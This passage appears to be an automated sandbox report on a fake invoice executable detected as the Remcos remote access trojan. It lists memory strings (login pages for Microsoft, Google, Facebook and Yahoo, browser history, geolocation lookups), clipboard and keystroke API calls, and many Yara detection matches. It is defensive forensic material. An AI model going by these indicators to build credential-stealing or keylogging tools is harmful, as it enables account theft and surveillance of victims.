                    Source: turbinals.exe, 00000005.00000003.1381036053.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$
                    Source: turbinals.exe, 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: turbinals.exe, 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl6
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: turbinals.exe, 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696501260359
                    Source: turbinals.exe, 00000005.00000002.1381486653.0000000000BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AF
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?ae1e93c052690ba0623cc864d4ad8ff9
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?d3f78c2c20f92f3d0890e3edc77b84b9
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: turbinals.exe, 00000005.00000003.1380996755.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381105492.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381015586.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000002.1382093472.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033__
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json?One
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=60046d
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: bhv7BD7.tmp.5.drString found in binary or memory: https://www.office.com/
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F44164
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F44164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F44164
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D54164
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F43F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F43F66
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F3001C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F5CABC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D6CABC
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
